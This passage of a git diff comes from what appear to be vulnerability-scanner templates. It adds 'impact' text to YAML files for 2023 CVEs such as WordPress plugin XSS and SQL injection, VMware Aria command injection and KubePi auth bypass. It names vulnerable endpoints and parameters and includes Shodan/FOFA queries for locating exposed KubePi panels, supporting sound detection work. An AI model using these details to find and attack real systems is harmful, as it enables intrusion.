@@ -6,6 +6,8 @@ info: severity: medium description: | WordPress BackupBuddy plugin before 8.8.3 contains a cross-site vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in various locations. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 8.8.3. reference: - https://wpscan.com/vulnerability/7b0eeafe-b9bc-43b2-8487-a23d3960f73f diff --git a/http/cves/2023/CVE-2023-0099.yaml b/http/cves/2023/CVE-2023-0099.yaml index 45fba91329..b083350a40 100644 --- a/http/cves/2023/CVE-2023-0099.yaml +++ b/http/cves/2023/CVE-2023-0099.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The plugin does not sanitise and escape some parameters before outputting them back in some pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin. + impact: | + Successful exploitation of this vulnerability can lead to session hijacking, defacement of websites, theft of sensitive information, and potential remote code execution. remediation: Fixed in version 115 reference: - https://wpscan.com/vulnerability/fd50f2d6-e420-4220-b485-73f33227e8f8 diff --git a/http/cves/2023/CVE-2023-0126.yaml b/http/cves/2023/CVE-2023-0126.yaml index 0f2fc78f8a..442df66a64 100644 --- a/http/cves/2023/CVE-2023-0126.yaml +++ b/http/cves/2023/CVE-2023-0126.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the affected device, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest security patches or firmware updates provided by SonicWall to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-0236.yaml b/http/cves/2023/CVE-2023-0236.yaml index 5ffd50bc83..9803c69f5b 100644 --- a/http/cves/2023/CVE-2023-0236.yaml +++ b/http/cves/2023/CVE-2023-0236.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Tutor LMS plugin before 2.0.10 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the reset_key and user_id parameters before outputting then back in attributes. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 2.0.10. reference: - https://wpscan.com/vulnerability/503835db-426d-4b49-85f7-c9a20d6ff5b8 diff --git a/http/cves/2023/CVE-2023-0261.yaml b/http/cves/2023/CVE-2023-0261.yaml index 458a7aa48f..2a79a65f29 100644 --- a/http/cves/2023/CVE-2023-0261.yaml +++ b/http/cves/2023/CVE-2023-0261.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | WordPress WP TripAdvisor Review Slider plugin before 10.8 is susceptible to authenticated SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber. This can lead, in turn, to obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an authenticated attacker to execute arbitrary SQL queries on the WordPress database, potentially leading to unauthorized access, data manipulation, or privilege escalation. remediation: Fixed in version 10.8. reference: - https://wpscan.com/vulnerability/6a3b6752-8d72-4ab4-9d49-b722a947d2b0 diff --git a/http/cves/2023/CVE-2023-0297.yaml b/http/cves/2023/CVE-2023-0297.yaml index 2868378f31..51583eb2ae 100644 --- a/http/cves/2023/CVE-2023-0297.yaml +++ b/http/cves/2023/CVE-2023-0297.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the target system. remediation: | Upgrade PyLoad to a version that is not affected by this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-0448.yaml b/http/cves/2023/CVE-2023-0448.yaml index 18287debda..e35727906c 100644 --- a/http/cves/2023/CVE-2023-0448.yaml +++ b/http/cves/2023/CVE-2023-0448.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | The WP Helper Lite WordPress plugin, in versions < 4.3, returns all GET parameters unsanitized in the response, resulting in a reflected cross-site scripting vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 4.3 and above reference: - https://wpscan.com/vulnerability/1f24db34-f608-4463-b4ee-9bc237774256 diff --git a/http/cves/2023/CVE-2023-0514.yaml b/http/cves/2023/CVE-2023-0514.yaml index 215d0c79be..1385f69d71 100644 --- a/http/cves/2023/CVE-2023-0514.yaml +++ b/http/cves/2023/CVE-2023-0514.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Membership Database before 1.0 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to a patched version of the Membership Database software or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2023/CVE-2023-0562.yaml b/http/cves/2023/CVE-2023-0562.yaml index c5b5f90068..b12171faea 100644 --- a/http/cves/2023/CVE-2023-0562.yaml +++ b/http/cves/2023/CVE-2023-0562.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | A vulnerability was found in PHPGurukul Bank Locker Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file index.php of the component Login. The manipulation of the argument username leads to sql injection. + impact: | + Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-0563.yaml b/http/cves/2023/CVE-2023-0563.yaml index a8a1b009da..4e4fd300ad 100644 --- a/http/cves/2023/CVE-2023-0563.yaml +++ b/http/cves/2023/CVE-2023-0563.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A vulnerability classified as problematic has been found in PHPGurukul Bank Locker Management System 1.0. This affects an unknown part of the file add-locker-form.php of the component Assign Locker. The manipulation of the argument ahname leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-0630.yaml b/http/cves/2023/CVE-2023-0630.yaml index b46c50a689..4b004693e5 100644 --- a/http/cves/2023/CVE-2023-0630.yaml +++ b/http/cves/2023/CVE-2023-0630.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | The Slimstat Analytics WordPress plugin before 4.9.3.3 does not prevent subscribers from rendering shortcodes that concatenates attributes directly into an SQL query. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database, potentially exposing sensitive information. remediation: Fixed in version 4.9.3.3 reference: - https://wpscan.com/vulnerability/b82bdd02-b699-4527-86cc-d60b56ab0c55 diff --git a/http/cves/2023/CVE-2023-0669.yaml b/http/cves/2023/CVE-2023-0669.yaml index 13f97fc05b..9e8bf2481f 100644 --- a/http/cves/2023/CVE-2023-0669.yaml +++ b/http/cves/2023/CVE-2023-0669.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Fortra GoAnywhere MFT is susceptible to remote code execution via unsafe deserialization of an arbitrary attacker-controlled object. This stems from a pre-authentication command injection vulnerability in the License Response Servlet. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-0942.yaml b/http/cves/2023/CVE-2023-0942.yaml index c1ddcfb5fd..084859a91d 100644 --- a/http/cves/2023/CVE-2023-0942.yaml +++ b/http/cves/2023/CVE-2023-0942.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Japanized for WooCommerce plugin before 2.5.5 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 2.5.5. reference: - https://wpscan.com/vulnerability/71aa9460-6dea-49cc-946c-d7d4bf723511 diff --git a/http/cves/2023/CVE-2023-0948.yaml b/http/cves/2023/CVE-2023-0948.yaml index e8714be571..a81897c803 100644 --- a/http/cves/2023/CVE-2023-0948.yaml +++ b/http/cves/2023/CVE-2023-0948.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Japanized for WooCommerce plugin before 2.5.8 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 2.5.8. reference: - https://wpscan.com/vulnerability/a78d75b2-85a0-41eb-9720-c726ca2e8718 diff --git a/http/cves/2023/CVE-2023-0968.yaml b/http/cves/2023/CVE-2023-0968.yaml index 0aff482ab3..a16e87d9f1 100644 --- a/http/cves/2023/CVE-2023-0968.yaml 
+++ b/http/cves/2023/CVE-2023-0968.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Watu Quiz plugin before 3.3.9.1 is susceptible to cross-site scripting. The plugin does not sanitize and escape some parameters, such as email, dn, date, and points, before outputting then back in a page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This exploit can be used against high-privilege users such as admin. + impact: | + Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing an attacker to execute malicious scripts on the victim's browser. remediation: Fixed in version 3.3.9.1. reference: - https://wpscan.com/vulnerability/29008d1a-62b3-4f40-b5a3-134455b01595 diff --git a/http/cves/2023/CVE-2023-1080.yaml b/http/cves/2023/CVE-2023-1080.yaml index 1690769b75..9947da23cf 100644 --- a/http/cves/2023/CVE-2023-1080.yaml +++ b/http/cves/2023/CVE-2023-1080.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress GN Publisher plugin before 1.5.6 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions. remediation: Fixed in version 1.5.6. reference: - https://wpscan.com/vulnerability/fcbcfb56-640d-4071-bc12-acac1b1e7a74 
diff --git a/http/cves/2023/CVE-2023-1177.yaml b/http/cves/2023/CVE-2023-1177.yaml index 4555a12e53..a5fbd9fdba 100644 --- a/http/cves/2023/CVE-2023-1177.yaml +++ b/http/cves/2023/CVE-2023-1177.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Mlflow before 2.2.1 is susceptible to local file inclusion due to path traversal \..\filename in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation could allow an attacker to read sensitive files on the server. remediation: | Upgrade Mlflow to version 2.2.1 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-1362.yaml b/http/cves/2023/CVE-2023-1362.yaml index 8ef85eb9ab..21e33c97f7 100644 --- a/http/cves/2023/CVE-2023-1362.yaml +++ b/http/cves/2023/CVE-2023-1362.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | This template checks for the presence of clickjacking prevention headers in the HTTP response, aiming to identify vulnerabilities related to the improper restriction of rendered UI layers or frames in the GitHub repository unilogies/bumsys prior to version 2.0.2. + impact: | + An attacker can trick users into performing unintended actions on the vulnerable application. remediation: | Upgrade to version 2.0.2 or later to mitigate the Clickjacking vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-1434.yaml b/http/cves/2023/CVE-2023-1434.yaml index 287c6fe3a6..d8b99a0acd 100644 --- a/http/cves/2023/CVE-2023-1434.yaml +++ b/http/cves/2023/CVE-2023-1434.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Odoo is a business suite that has features for many business-critical areas, such as e-commerce, billing, or CRM. Versions before the 16.0 release are vulnerable to CVE-2023-1434 and is caused by an incorrect content type being set on an API endpoint. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by the vendor to fix this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-1454.yaml b/http/cves/2023/CVE-2023-1454.yaml index b97f01e3d5..ba2ddf4b82 100644 --- a/http/cves/2023/CVE-2023-1454.yaml +++ b/http/cves/2023/CVE-2023-1454.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A vulnerability classified as critical has been found in jeecg-boot 3.5.0. This affects an unknown part of the file jmreport/qurestSql. The manipulation of the argument apiSelectId leads to sql injection. It is possible to initiate the attack remotely. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade Jeecg-boot to a patched version or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2023/CVE-2023-1496.yaml b/http/cves/2023/CVE-2023-1496.yaml index 4feab5de92..05e566cc38 100644 --- a/http/cves/2023/CVE-2023-1496.yaml +++ b/http/cves/2023/CVE-2023-1496.yaml 
@@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Cross-site Scripting (XSS) - Reflected in GitHub repository imgproxy/imgproxy prior to 3.14.0. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: | Upgrade to Imgproxy version 3.14.0 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-1546.yaml b/http/cves/2023/CVE-2023-1546.yaml index fde98b4101..ca80fc8be8 100644 --- a/http/cves/2023/CVE-2023-1546.yaml +++ b/http/cves/2023/CVE-2023-1546.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The MyCryptoCheckout WordPress plugin before 2.124 does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 2.124 reference: - https://wpscan.com/vulnerability/bb065397-370f-4ee1-a2c8-20e4dc4415a0 diff --git a/http/cves/2023/CVE-2023-1671.yaml b/http/cves/2023/CVE-2023-1671.yaml index 15c99c09d5..1428110985 100644 --- a/http/cves/2023/CVE-2023-1671.yaml +++ b/http/cves/2023/CVE-2023-1671.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches or updates provided by Sophos to mitigate this vulnerability. reference: 
diff --git a/http/cves/2023/CVE-2023-1698.yaml b/http/cves/2023/CVE-2023-1698.yaml index 15ec6ce3b3..9a878dd1f0 100644 --- a/http/cves/2023/CVE-2023-1698.yaml +++ b/http/cves/2023/CVE-2023-1698.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | In multiple products of WAGO, a vulnerability allows an unauthenticated, remote attacker to create new users and change the device configuration which can result in unintended behavior, Denial of Service, and full system compromise. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the target system. remediation: | Apply the latest security patches and updates provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-1730.yaml b/http/cves/2023/CVE-2023-1730.yaml index 9f3e49ee50..572a57f7e5 100644 --- a/http/cves/2023/CVE-2023-1730.yaml +++ b/http/cves/2023/CVE-2023-1730.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The SupportCandy WordPress plugin before 3.1.5 does not validate and escape user input before using it in an SQL statement, which could allow unauthenticated attackers to perform SQL injection attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: Fixed in version 3.1.5 reference: - https://wpscan.com/vulnerability/44b51a56-ff05-4d50-9327-fc9bab74d4b7 diff --git a/http/cves/2023/CVE-2023-1835.yaml b/http/cves/2023/CVE-2023-1835.yaml index 30954cf750..83b5bb747c 100644 --- a/http/cves/2023/CVE-2023-1835.yaml +++ b/http/cves/2023/CVE-2023-1835.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Ninja Forms before 3.6.22 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of Ninja Forms (3.6.22 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-1890.yaml b/http/cves/2023/CVE-2023-1890.yaml index 9e09513484..cdf2cc80f8 100644 --- a/http/cves/2023/CVE-2023-1890.yaml +++ b/http/cves/2023/CVE-2023-1890.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Tablesome before 1.0.9 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could lead to the execution of arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 1.0.9. reference: - https://wpscan.com/vulnerability/8ef64490-30cd-4e07-9b7c-64f551944f3d diff --git a/http/cves/2023/CVE-2023-20073.yaml b/http/cves/2023/CVE-2023-20073.yaml index 116207bde0..849927069b 100644 --- a/http/cves/2023/CVE-2023-20073.yaml +++ b/http/cves/2023/CVE-2023-20073.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device. + impact: | + Successful exploitation of this vulnerability could lead to remote code execution or unauthorized access to sensitive information. remediation: | Apply the latest security patches provided by Cisco to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-2023.yaml b/http/cves/2023/CVE-2023-2023.yaml index adcd654c54..ce247f726f 100644 --- a/http/cves/2023/CVE-2023-2023.yaml +++ b/http/cves/2023/CVE-2023-2023.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Custom 404 Pro before 3.7.3 is susceptible to cross-site scripting via the search parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 3.7.3 reference: - https://wpscan.com/vulnerability/8859843a-a8c2-4f7a-8372-67049d6ea317 diff --git a/http/cves/2023/CVE-2023-20864.yaml b/http/cves/2023/CVE-2023-20864.yaml index 95982b0f2a..3f1cd178ac 100644 --- a/http/cves/2023/CVE-2023-20864.yaml 
+++ b/http/cves/2023/CVE-2023-20864.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | VMware Aria Operations for Logs contains a deserialization vulnerability. An unauthenticated, malicious actor with network access to VMware Aria Operations for Logs may be able to execute arbitrary code as root. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the necessary security patches or updates provided by VMware to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-20887.yaml b/http/cves/2023/CVE-2023-20887.yaml index 2a6848cd24..8621447d3d 100644 --- a/http/cves/2023/CVE-2023-20887.yaml +++ b/http/cves/2023/CVE-2023-20887.yaml @@ -7,6 +7,8 @@ info: description: | VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the context of 'root' on the appliance. VMWare 6.x version are vulnerable. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches provided by VMware to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-20888.yaml b/http/cves/2023/CVE-2023-20888.yaml index 1576dc2cbd..ede67d02f5 100644 --- a/http/cves/2023/CVE-2023-20888.yaml +++ b/http/cves/2023/CVE-2023-20888.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Aria Operations for Networks contains an authenticated deserialization vulnerability. A malicious actor with network access to VMware Aria Operations for Networks and valid 'member' role credentials may be able to perform a deserialization attack resulting in remote code execution. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches or updates provided by VMware to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-20889.yaml b/http/cves/2023/CVE-2023-20889.yaml index eb0cf15ee9..d40bb5410e 100644 --- a/http/cves/2023/CVE-2023-20889.yaml +++ b/http/cves/2023/CVE-2023-20889.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Aria Operations for Networks contains an information disclosure vulnerability. A malicious actor with network access to VMware Aria Operations for Networks may be able to perform a command injection attack resulting in information disclosure. + impact: | + Successful exploitation of this vulnerability can result in unauthorized access to sensitive information. remediation: | Apply the latest security patches provided by VMware to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-2130.yaml b/http/cves/2023/CVE-2023-2130.yaml index 654d46910c..e39f05b114 100644 --- a/http/cves/2023/CVE-2023-2130.yaml +++ b/http/cves/2023/CVE-2023-2130.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | A vulnerability classified as critical has been found in SourceCodester Purchase Order Management System 1.0. Affected is an unknown function of the file /admin/suppliers/view_details.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226206 is the identifier assigned to this vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-2178.yaml b/http/cves/2023/CVE-2023-2178.yaml index f2da8bc885..309cd10db2 100644 --- a/http/cves/2023/CVE-2023-2178.yaml +++ b/http/cves/2023/CVE-2023-2178.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The plugin does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update Aajoda Testimonials plugin to version 2.2.2 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-22463.yaml b/http/cves/2023/CVE-2023-22463.yaml index 2233bb0300..e4cf230da6 100644 --- a/http/cves/2023/CVE-2023-22463.yaml +++ b/http/cves/2023/CVE-2023-22463.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | KubePi is a k8s panel. The jwt authentication function of KubePi through version 1.6.2 uses hard-coded Jwtsigkeys, resulting in the same Jwtsigkeys for all online projects. This means that an attacker can forge any jwt token to take over the administrator account of any online project. Furthermore, they may use the administrator to take over the k8s cluster of the target enterprise. `session.go`, the use of hard-coded JwtSigKey, allows an attacker to use this value to forge jwt tokens arbitrarily. The JwtSigKey is confidential and should not be hard-coded in the code. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access and control of the Kubernetes cluster. remediation: The vulnerability has been fixed in 1.6.3. In the patch, JWT key is specified in app.yml. If the user leaves it blank, a random key will be used. There are no workarounds aside from upgrading. reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/KubePi/KubePi%20JwtSigKey%20%E7%99%BB%E9%99%86%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%20CVE-2023-22463.md @@ -19,14 +21,13 @@ info: epss-percentile: 0.26993 cpe: cpe:2.3:a:fit2cloud:kubepi:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: html:"kubepi" - fofa-query: "kubepi" + max-request: 1 vendor: fit2cloud product: kubepi + shodan-query: html:"kubepi" + fofa-query: "kubepi" tags: cve,cve2023,kubepi,k8s,auth-bypass - variables: name: "{{rand_base(6)}}" password: "{{rand_base(8)}}" diff --git a/http/cves/2023/CVE-2023-22478.yaml b/http/cves/2023/CVE-2023-22478.yaml index c24c0125b0..6a96be97f9 100644 --- a/http/cves/2023/CVE-2023-22478.yaml +++ b/http/cves/2023/CVE-2023-22478.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | KubePi is a modern Kubernetes panel. The API interfaces with unauthorized entities and may leak sensitive information. This issue has been patched in version 1.6.4. There are currently no known workarounds. + impact: | + An attacker can gain unauthorized access to sensitive information. remediation: | Upgrade KubePi to a version higher than v1.6.4 to mitigate the vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-22480.yaml b/http/cves/2023/CVE-2023-22480.yaml index 15aa673510..5f8088772f 100644 --- a/http/cves/2023/CVE-2023-22480.yaml +++ b/http/cves/2023/CVE-2023-22480.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | KubeOperator is an open source Kubernetes distribution focused on helping enterprises plan, deploy and operate production-level K8s clusters. In KubeOperator versions 3.16.3 and below, API interfaces with unauthorized entities and can leak sensitive information. This vulnerability could be used to take over the cluster under certain conditions. This issue has been patched in version 3.16.4. + impact: | + An attacker can download sensitive files from the KubeOperator Foreground kubeconfig file, potentially leading to unauthorized access or exposure of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-2252.yaml b/http/cves/2023/CVE-2023-2252.yaml index dc0101ad52..be19127ff5 100644 --- a/http/cves/2023/CVE-2023-2252.yaml +++ b/http/cves/2023/CVE-2023-2252.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Directorist before 7.5.4 is susceptible to Local File Inclusion as it does not validate the file parameter when importing CSV files. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. remediation: Fixed in version 7.5.4 reference: - https://wpscan.com/vulnerability/9da6eede-10d0-4609-8b97-4a5d38fa8e69 diff --git a/http/cves/2023/CVE-2023-22620.yaml b/http/cves/2023/CVE-2023-22620.yaml index f1c7ddba27..a073b53cb8 100644 --- a/http/cves/2023/CVE-2023-22620.yaml +++ b/http/cves/2023/CVE-2023-22620.yaml @@ -6,6 +6,8 @@ info: severity: high description: | An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows sessionid information disclosure via an invalid authentication attempt. This can afterwards be used to bypass the device's authentication and get access to the administrative interface. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information or perform actions on behalf of the user. remediation: Upgrade to version 12.2.5.1 or newer reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-22620 diff --git a/http/cves/2023/CVE-2023-2272.yaml b/http/cves/2023/CVE-2023-2272.yaml index 4d09d119cd..bd9df48141 100644 --- a/http/cves/2023/CVE-2023-2272.yaml +++ b/http/cves/2023/CVE-2023-2272.yaml 
